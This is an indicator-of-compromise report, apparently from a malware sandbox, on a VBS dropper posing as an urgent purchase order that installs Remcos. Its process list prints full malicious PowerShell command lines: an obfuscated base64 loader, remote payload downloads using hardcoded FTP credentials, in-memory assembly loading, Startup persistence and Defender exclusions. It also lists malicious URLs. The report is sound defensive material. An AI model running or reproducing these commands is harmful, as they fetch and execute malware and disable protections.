IOC Report
Urgent Purchase Order (P.O.) No.477764107102024.vbs

loading gif

Files

File Path
Type
Category
Malicious
Urgent Purchase Order (P.O.) No.477764107102024.vbs
Unicode text, UTF-16, little-endian text, with CRLF, CR line terminators
initial sample
 malicious
C:\ProgramData\remcos\logs.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\mdwpy.ps1
Unicode text, UTF-16, little-endian text, with very long lines (32626)
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bytbe0lu.5x0.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dqr0t5qa.y3l.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fburmymg.it4.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ffsnp4v2.wlp.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fgj3icwo.enj.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hqqzfiec.rje.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ivmmka1i.tbz.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kws1ttef.yuv.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mc0mzrig.tcg.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mseq1frs.s2g.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nuvumnvz.nyk.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pqsn33sm.4kg.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rhjyf0vm.thl.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_supggpli.nfi.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t5535bd5.seh.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xhhxubmg.4tp.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xqtebzwe.2vy.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xrg05ose.01x.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yfqcp1xy.2sm.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zu42j01z.amv.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF703d94.TMP (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF705d32.TMP (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NIW1Y35F4WBPZ7DXT8GN.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OWD8ZYLHR3SQW3ZUXJGU.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Z46UC19DXDR7NXVKOKIN.temp
data
dropped
C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\x2.ps1
ASCII text, with very long lines (396), with no line terminators
dropped
There are 22 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Urgent Purchase Order (P.O.) No.477764107102024.vbs"
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAHMAaQ' + [char]66 + 'tAG8Abg' + [char]66 + 'hAHMAdA' + [char]66 + 'vAGwAZQ' + [char]66 + 'yAGMAaQ' + [char]66 + '1AGMALg' + [char]66 + 'yAG8ALw' + [char]66 + 'pAG0AYQ' + [char]66 + 'nAGUAcwAvAHMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAC4AdA' + [char]66 + '4AHQAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJw' + [char]66 + 'JAFYARg' + [char]66 + 'yAHAAJwAgACgAZA' + [char]66 + 'vAGgAdA' + [char]66 + 'lAE0AdA' + [char]66 + 'lAEcALgApACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAKA' + [char]66 + 'lAHAAeQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HAC4AKQAgAFoAYw' + [char]66 + 'CAGMAYQAkACAAKA' + [char]66 + 'kAGEAbw' + [char]66 + 'MAC4Abg' + [char]66 + 'pAGEAbQ' + [char]66 + 'vAEQAdA' + [char]66 + 'uAGUAcg' + [char]66 + 'yAHUAQwA6ADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOwApACAAKQAgACcAQQAnACAALAAgACcAkyE6AJMhJwAgACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAUgAuAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TADQANg' + [char]66 + 'lAHMAYQ' + [char]66 + 'CAG0Abw' + [char]66 + 'yAEYAOgA6AF0AdA' + [char]66 + 'yAGUAdg' + [char]66 + 'uAG8AQwAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIA' + [char]66 + 'dAF0AWw' + [char]66 + 'lAHQAeQ' + [char]66 + 'CAFsAOwAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAgAD0AIA' + [char]66 + 'YAFAAVQ' + [char]66 + '1AGgAJAA7ACkAIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUw' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66 + 'sAGsAeA' + [char]66 + 'iAHoAJAAgAD0AIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + 'sAGsAeA' + [char]66 + 'iAHoAJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + 'sAGsAeA' + [char]66 + 'iAHoAJAA7ACkAKA' + [char]66 + 'lAHMAbw' + [char]66 + 'wAHMAaQ' + [char]66 + 'kAC4AbA' + [char]66 + 'rAHgAYg' + [char]66 + '6ACQAOwApACAAJw' + [char]66 + '0AHgAdAAuADEAMA' + [char]66 + 'MAEwARAAvADEAMAAvAHIAZQ' + [char]66 + '0AHAAeQ' + [char]66 + 'yAGMAcA' + [char]66 + 'VAC8Acg' + [char]66 + 'iAC4AbQ' + [char]66 + 'vAGMALg' + [char]66 + '0AGEAcg' + [char]66 + 'iAHYAaw' + [char]66 + 'jAHMAZQ' + [char]66 + 'kAC4AcA' + [char]66 + '0AGYAQAAxAHQAYQ' + [char]66 + 'yAGIAdg' + [char]66 + 'rAGMAcw' + [char]66 + 'lAGQALwAvADoAcA' + [char]66 + '0AGYAJwAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'EAC4AbA' + [char]66 + 'rAHgAYg' + [char]66 + '6ACQAIAA9ACAAZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAA7ACkAJw' + [char]66 + 'AAEAAcA' + [char]66 + 'KADgANwA1ADEAMg' + [char]66 + 'vAHIAcA' + [char]66 + 'yAGUAcA' + [char]66 + 'vAGwAZQ' + [char]66 + '2AGUAZAAnACwAKQApADkANAAsADYAMQAxACwANwA5ACwANAAxADEALAA4ADkALAA4ADEAMQAsADcAMAAxACwAOQA5ACwANQAxADEALAAxADAAMQAsADAAMAAxACgAXQ' + [char]66 + 'dAFsAcg' + [char]66 + 'hAGgAYw' + [char]66 + 'bACAAbg' + [char]66 + 'pAG8AagAtACgAKA' + [char]66 + 'sAGEAaQ' + [char]66 + '0AG4AZQ' + [char]66 + 'kAGUAcg' + [char]66 + 'DAGsAcg' + [char]66 + 'vAHcAdA' + [char]66 + 'lAE4ALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAG8ALQ' + [char]66 + '3AGUAbgAgAD0AIA' + [char]66 + 'zAGwAYQ' + [char]66 + 'pAHQAbg' + [char]66 + 'lAGQAZQ' + [char]66 + 'yAEMALg' + [char]66 + 'sAGsAeA' + [char]66 + 'iAHoAJAA7ADgARg' + [char]66 + 'UAFUAOgA6AF0AZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AdA' + [char]66 + '4AGUAVAAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AbA' + [char]66 + 'rAHgAYg' + [char]66 + '6ACQAOwApAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + 'XAC4AdA' + [char]66 + 'lAE4AIA' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIATwAtAHcAZQ' + [char]66 + 'OACgAIAA9ACAAbA' + [char]66 + 'rAHgAYg' + [char]66 + '6ACQAOw' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkADsAMgAxAHMAbA' + [char]66 + 'UADoAOg' + [char]66 + 'dAGUAcA' + [char]66 + '5AFQAbA' + [char]66 + 'vAGMAbw' + [char]66 + '0AG8Acg' + [char]66 + 'QAHkAdA' + [char]66 + 'pAHIAdQ' + [char]66 + 'jAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'sAG8AYw' + [char]66 + 'vAHQAbw' + [char]66 + 'yAFAAeQ' + [char]66 + '0AGkAcg' + [char]66 + '1AGMAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOw' + [char]66 + '9AGUAdQ' + [char]66 + 'yAHQAJA' + [char]66 + '7ACAAPQAgAGsAYw' + [char]66 + 'hAGIAbA' + [char]66 + 'sAGEAQw' + [char]66 + 'uAG8AaQ' + [char]66 + '0AGEAZA' + [char]66 + 'pAGwAYQ' + [char]66 + 'WAGUAdA' + [char]66 + 'hAGMAaQ' + [char]66 + 'mAGkAdA' + [char]66 + 'yAGUAQw' + [char]66 + 'yAGUAdg' + [char]66 + 'yAGUAUwA6ADoAXQ' + [char]66 + 'yAGUAZw' + [char]66 + 'hAG4AYQ' + [char]66 + 'NAHQAbg' + [char]66 + 'pAG8AUA' + [char]66 + 'lAGMAaQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bAHsAIA' + [char]66 + 'lAHMAbA' + [char]66 + 'lAH0AIA' + [char]66 + 'mAC8AIAAwACAAdAAvACAAcgAvACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'uAHcAbw' + [char]66 + 'kAHQAdQ' + [char]66 + 'oAHMAIAA7ACcAMAA4ADEAIA' + [char]66 + 'wAGUAZQ' + [char]66 + 'sAHMAJwAgAGQAbg' + [char]66 + 'hAG0AbQ' + [char]66 + 'vAGMALQAgAGUAeA' + [char]66 + 'lAC4AbA' + [char]66 + 'sAGUAaA' + [char]66 + 'zAHIAZQ' + [char]66 + '3AG8AcAA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIAApACAAJw' + [char]66 + 'wAHUAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'TAFwAcw' + [char]66 + 'tAGEAcg' + [char]66 + 'nAG8Acg' + [char]66 + 'QAFwAdQ' + [char]66 + 'uAGUATQAgAHQAcg' + [char]66 + 'hAHQAUw' + [char]66 + 'cAHMAdw' + [char]66 + 'vAGQAbg' + [char]66 + 'pAFcAXA' + [char]66 + '0AGYAbw' + [char]66 + 'zAG8Acg' + [char]66 + 'jAGkATQ' + [char]66 + 'cAGcAbg' + [char]66 + 'pAG0AYQ' + [char]66 + 'vAFIAXA' + [char]66 + 'hAHQAYQ' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AFwAJwAgACsAIA' + [char]66 + 'aAEsAbg' + [char]66 + 'ZAE0AJAAgACgAIA' + [char]66 + 'uAG8AaQ' + [char]66 + '0AGEAbg' + [char]66 + 'pAHQAcw' + [char]66 + 'lAEQALQAgACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAbQ' + [char]66 + 'lAHQASQAtAHkAcA' + [char]66 + 'vAEMAIAA7ACAAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'zAGUAcg' + [char]66 + 'vAG4ALwAgAHQAZQ' + [char]66 + 'pAHUAcQAvACAARw' + [char]66 + 'jAFcAaQ' + [char]66 + 'SACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'hAHMAdQ' + [char]66 + '3ACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'sAGwAZQ' + [char]66 + 'oAHMAcg' + [char]66 + 'lAHcAbw' + [char]66 + 'wACAAOwApACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAFQAcg' + [char]66 + 'IAFYAdQAkACgAIAA9ACAARw' + [char]66 + 'jAFcAaQ' + [char]66 + 'SADsAKQAgAGUAbQ' + [char]66 + 'hAE4Acg' + [char]66 + 'lAHMAVQA6ADoAXQ' + [char]66 + '0AG4AZQ' + [char]66 + 'tAG4Abw' + [char]66 + 'yAGkAdg' + [char]66 + 'uAEUAWwAgACsAIAAnAFwAcw' + [char]66 + 'yAGUAcw' + [char]66 + 'VAFwAOg' + [char]66 + 'DACcAKAAgAD0AIA' + [char]66 + 'aAEsAbg' + [char]66 + 'ZAE0AJAA7ACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAVA' + [char]66 + 'yAEgAVg' + [char]66 + '1ACQAIAAsAEIASw' + [char]66 + 'MAFIAVQAkACgAZQ' + [char]66 + 'sAGkARg' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66 + 'mAG0AcA' + [char]66 + 'xAG4AJAA7ADgARg' + [char]66 + 'UAFUAOgA6AF0AZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AdA' + [char]66 + '4AGUAVAAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AZg' + [char]66 + 'tAHAAcQ' + [char]66 + 'uACQAOwApAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + 'XAC4AdA' + [char]66 + 'lAE4AIA' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIATwAtAHcAZQ' + [char]66 + 'OACgAIAA9ACAAZg' + [char]66 + 'tAHAAcQ' + [char]66 + 'uACQAOw' + [char]66 + '9ADsAIAApACcAdA' + [char]66 + 'PAEwAYw' + [char]66 + 'fAEsAYQAzAFoAZg' + [char]66 + 'vAFgAMg' + [char]66 + 'KAEoAcg' + [char]66 + 'WAGgAbQ' + [char]66 + 'WADkAYw' + [char]66 + 'tADkAWA' + [char]66 + 'zAHUAWA' + [char]66 + 'tAGoAMQ' + [char]66 + 'nADEAJwAgACsAIA' + [char]66 + 'JAG8AcQ' + [char]66 + 'hAEYAJAAoACAAPQAgAEkAbw' + [char]66 + 'xAGEARgAkAHsAIA' + [char]66 + 'lAHMAbA' + [char]66 + 'lAH0AOwAgACkAJwAyADQAdQ' + [char]66 + 'YAEoAVA' + [char]66 + 'xAGEAbQ' + [char]66 + 'nAHkATQ' + [char]66 + '0AEYAeg' + [char]66 + 'hAGsAUA' + [char]66 + 'SADEAcQ' + [char]66 + 'fAEkAdg' + [char]66 + 'HAGkAWA' + [char]66 + 'OAGQAcQ' + [char]66 + 'hAE4AMQAnACAAKwAgAEkAbw' + [char]66 + 'xAGEARgAkACgAIAA9ACAASQ' + [char]66 + 'vAHEAYQ' + [char]66 + 'GACQAewAgACkAIA' + [char]66 + 'yAG0ARQ' + [char]66 + '3AGoAJAAgACgAIA' + [char]66 + 'mAGkAOwAgACkAJwA0ADYAJwAoAHMAbg' + [char]66 + 'pAGEAdA' + [char]66 + 'uAG8AQwAuAEUAUg' + [char]66 + 'VAFQAQw' + [char]66 + 'FAFQASQ' + [char]66 + 'IAEMAUg' + [char]66 + '' + [char]66 + 'AF8AUg' + [char]66 + 'PAFMAUw' + [char]66 + 'FAEMATw' + [char]66 + 'SAFAAOg' + [char]66 + '2AG4AZQAkACAAPQAgAHIAbQ' + [char]66 + 'FAHcAagAkADsAJwA9AGQAaQAmAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8AZAA9AHQAcg' + [char]66 + 'vAHAAeA' + [char]66 + 'lAD8AYw' + [char]66 + '1AC8AbQ' + [char]66 + 'vAGMALg' + [char]66 + 'lAGwAZw' + [char]66 + 'vAG8AZwAuAGUAdg' + [char]66 + 'pAHIAZAAvAC8AOg' + [char]66 + 'zAHAAdA' + [char]66 + '0AGgAJwAgAD0AIA' + [char]66 + 'JAG8AcQ' + [char]66 + 'hAEYAJAA7ACkAIAAnAHUAcw' + [char]66 + 'tAC4Abg' + [char]66 + 'pAHcAcA' + [char]66 + 'VAFwAJwAgACsAIA' + [char]66 + 'UAHIASA' + [char]66 + 'WAHUAJAAgACgAIA' + [char]66 + 'sAGUAZAA7ACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAVA' + [char]66 + 'yAEgAVg' + [char]66 + '1ACQAewAgACkAIA' + [char]66 + 'MAEEAcg' + [char]66 + '3AEoAJAAgACgAIA' + [char]66 + 'mAGkAOwAgACkAMgAoAHMAbA' + [char]66 + 'hAHUAcQ' + [char]66 + 'FAC4Acg' + [char]66 + 'vAGoAYQ' + [char]66 + 'NAC4Abg' + [char]66 + 'vAGkAcw' + [char]66 + 'yAGUAVgAuAHQAcw' + [char]66 + 'vAGgAJAAgAD0AIA' + [char]66 + 'MAEEAcg' + [char]66 + '3AEoAJAAgADsA';$rtnbm = $qKKzc; ;$rtnbm = $qKKzc.replace('???' , 'B') ;;$lpnhb = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $rtnbm ) ); $lpnhb = $lpnhb[-1..-$lpnhb.Length] -join '';$lpnhb = $lpnhb.replace('%XRqhI%','C:\Users\user\Desktop\Urgent Purchase Order (P.O.) No.477764107102024.vbs');powershell $lpnhb
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$nqpmf = (New-Object Net.WebClient);$nqpmf.Encoding = [System.Text.Encoding]::UTF8;$nqpmf.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Urgent Purchase Order (P.O.) No.477764107102024.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$zbxkl = (New-Object Net.WebClient);$zbxkl.Encoding = [System.Text.Encoding]::UTF8;$zbxkl.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $zbxkl.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$zbxkl.dispose();$zbxkl = (New-Object Net.WebClient);$zbxkl.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $zbxkl.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Urgent Purchase Order (P.O.) No.477764107102024.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.revres/segami/or.cuicrelotsanomis//:sptth' , $huUPX , 'D D1D' ) );};"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
 malicious
C:\Windows\System32\cmd.exe
cmd.exe /c mkdir "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x2.ps1"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\mdwpy.ps1"
malicious
C:\Windows\System32\cmd.exe
cmd.exe /c del "C:\Users\user\Desktop\Urgent Purchase Order (P.O.) No.477764107102024.vbs"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
 malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\mdwpy.ps1' ";exit
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\mdwpy.ps1' ";exit
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
 malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\mdwpy.ps1' ";exit
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\mdwpy.ps1' ";exit
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
 malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 12 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://paste.ee/d/P0BOw/0
188.114.96.3
 malicious
https://simonastolerciuc.ro/images/server.txt
85.120.16.93
 malicious
2harbu03.duckdns.org
malicious
https://paste.ee/d/FwIIK/0
188.114.96.3
 malicious
https://paste.ee/d/9xfVr/0
188.114.96.3
 malicious
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
https://simonastolerciuc.ro
unknown
https://simonastolerciuc.ro/images/sh
unknown
http://simonastolerciuc.ro
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://paste.ee
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://ftp.desckvbrat.com.br
unknown
https://go.micro
unknown
http://desckvbrat.com.br
unknown
http://www.microsoft.co
unknown
https://contoso.com/License
unknown
https://paste.ee/d/P0BOw/0P
unknown
https://www.google.com;
unknown
https://contoso.com/Icon
unknown
https://analytics.paste.ee
unknown
https://paste.ee
unknown
https://aka.ms/pscore6
unknown
https://pastebin.com/raw/pQQ0n3eA
172.67.19.24
https://github.com/Pester/Pester
unknown
https://ion=v4.535
unknown
http://geoplugin.net/json.gp
unknown
https://www.google.com
unknown
https://ion=v4.5:
unknown
http://geoplugin.net/json.gp/C
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://oneget.orgX
unknown
